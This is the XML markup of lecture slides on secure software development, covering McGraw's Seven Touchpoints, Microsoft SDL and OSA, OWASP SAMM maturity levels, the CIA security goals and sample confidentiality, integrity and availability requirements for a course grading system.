              <a:gd fmla="val 127539" name="adj1"/>
              <a:gd fmla="val -7038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Artifacts</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="134" name="Google Shape;134;p25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="2520675" y="1413450"/>
            <a:ext cx="411900" cy="3976500"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd fmla="val 8333" name="adj1"/>
              <a:gd fmla="val 48205"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txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1195050" y="4568800"/>
            <a:ext cx="26064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2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Process-agnostic</a:t>
            </a:r>
            <a:endParaRPr sz="24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Seven Touchpoints</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="141" name="Google Shape;141;p26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6294550" y="848500"/>
            <a:ext cx="2537700" cy="37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Knowledge catalogs into </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>3 Knowledge categories </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Prescriptive </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Diagnostic</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Historical</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="142" name="Google Shape;142;p26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1383950" y="4568800"/>
            <a:ext cx="3438000" cy="40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Figure 1-12 on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[McGraw, 2010] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Page 37</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="143" name="Google Shape;143;p26"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="464250" y="996575"/>
            <a:ext cx="5546950" cy="357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Microsoft SDL</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="149" name="Google Shape;149;p27"/>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Three core concepts: education, continuous process improvement, and accountability.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>A collection of mandatory activities, presented in the order they should occur and grouped by the phases of the traditional software development life cycle (SDLC).</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Security and privacy roles: reviewer/advisory roles(auditor, expert) and team champions.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Focus on quality and treat security as part of quality.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.microsoft.com/en-us/securityengineering</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SDL Practices</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="155" name="Google Shape;155;p28"/>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28"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="684724" y="2184760"/>
            <a:ext cx="7480174" cy="1297989"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="157" name="Google Shape;157;p28"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="978850" y="919550"/>
            <a:ext cx="7065298" cy="1349075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="158" name="Google Shape;158;p28"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="831925" y="3482750"/>
            <a:ext cx="8021600" cy="141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Operational</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3450">
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Security Assurance (OSA)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="164" name="Google Shape;164;p29"/>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9"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="449016" y="1028200"/>
            <a:ext cx="6210573" cy="3733200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="166" name="Google Shape;166;p29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="449025" y="4568875"/>
            <a:ext cx="595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https://www.microsoft.com/en-us/securityengineering/osa/practices</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>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OWASP SAMM</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="172" name="Google Shape;172;p30"/>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Software Assurance Maturity Model (SAMM) is an open framework to help organizations formulate and implement a strategy for software security that is tailored to the specific risks facing the organizations. (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.owasp.org/index.php/OWASP_SAMM_Project</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> )</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>SAMM v1.0 was written by Pravir Chandra in 2009. SAMM v2.0 was released with an updated SAMM Toolbox and a new Benchmark initiative.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>It can be used by projects or organizations in different sizes. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Flexible, iterative, risk-based, detailed, well-defined, measurable</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>SAMM is version controlled to help manage its evolution. Github link: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://github.com/OWASP/samm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>.  All the model content has been converted to YAML files, allowing tools or other SAMM consumers to automatically use the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OWASP SAMM</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="178" name="Google Shape;178;p31"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="878175"/>
            <a:ext cx="8839200" cy="2590800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="179" name="Google Shape;179;p31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="3468975"/>
            <a:ext cx="18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 Business functions</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="180" name="Google Shape;180;p31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2488750" y="2371650"/>
            <a:ext cx="187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 practices in each business functions</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="181" name="Google Shape;181;p31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4448100" y="2854575"/>
            <a:ext cx="4277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555555"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>For each security practice, SAMM defines three maturity levels.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="555555"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Activities in each practice are grouped in logical flows and divided into two streams. Each stream covers different aspects of the practice and has its own objectives, aligning and linking the activities in the practice over the different maturity levels.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="182" name="Google Shape;182;p31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5307600" y="121750"/>
            <a:ext cx="38364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Char char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1: Ad hoc provision </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2: Increased efficiency and effectiveness </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3: Comprehensive mastery at scale</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OWASP SAMM</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="188" name="Google Shape;188;p32"/>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5 Business functions and 15 security practices (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://owaspsamm.org/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>) </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>The Pdf version</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="189" name="Google Shape;189;p32"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2606775" y="1311200"/>
            <a:ext cx="5799900" cy="3257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Security Goals: CIA </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64" name="Google Shape;64;p15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="911875"/>
            <a:ext cx="5607900" cy="389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Confidentiality: prevents unauthorized use or disclosure of the stored and transferred information. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Integrity: prevents unauthorized modification of the stored and transferred information (guards the completeness and accuracy)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Accessibility: allows authorized users to have timely and reliable access of the information or service. </a:t>
            </a:r>
            <a:endParaRPr/>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 name="Google Shape;66;p15"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5752200" y="897900"/>
            <a:ext cx="3239400" cy="296266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195" name="Google Shape;195;p33"/>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Security Practices - ?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Education and Awareness - ?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Maturity Level and Metrics - ?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Specific tools -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AutoNum type="alphaUcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Seven Touch Points</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="alphaUcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Microsoft SDL</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="alphaUcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>OWASP SAMM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endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="201" name="Google Shape;201;p34"/>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Requirements</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="207" name="Google Shape;207;p35"/>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Typically derived from basic information security goals CIA</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Confidentiality: </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="2" marL="1371600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>Project details </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" u="sng"/>
              <a:t>can only</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t> be viewed by the owner of the project. </a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="2" marL="1371600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>A student’s grade information can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" u="sng"/>
              <a:t>only </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>be seen by that student, and the instructor. </a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Integrity: </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="2" marL="1371600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>Project details</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" u="sng"/>
              <a:t> can only </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>be modified by the owner of the project</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="2" marL="1371600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>The grade can</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" u="sng"/>
              <a:t> only </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>be modified by the instructor. </a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Availability: </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="2" marL="1371600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>All users can access user data and project data. General users can view data.</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="2" marL="1371600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>All students can access their registered course content. </a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>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Requirements</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
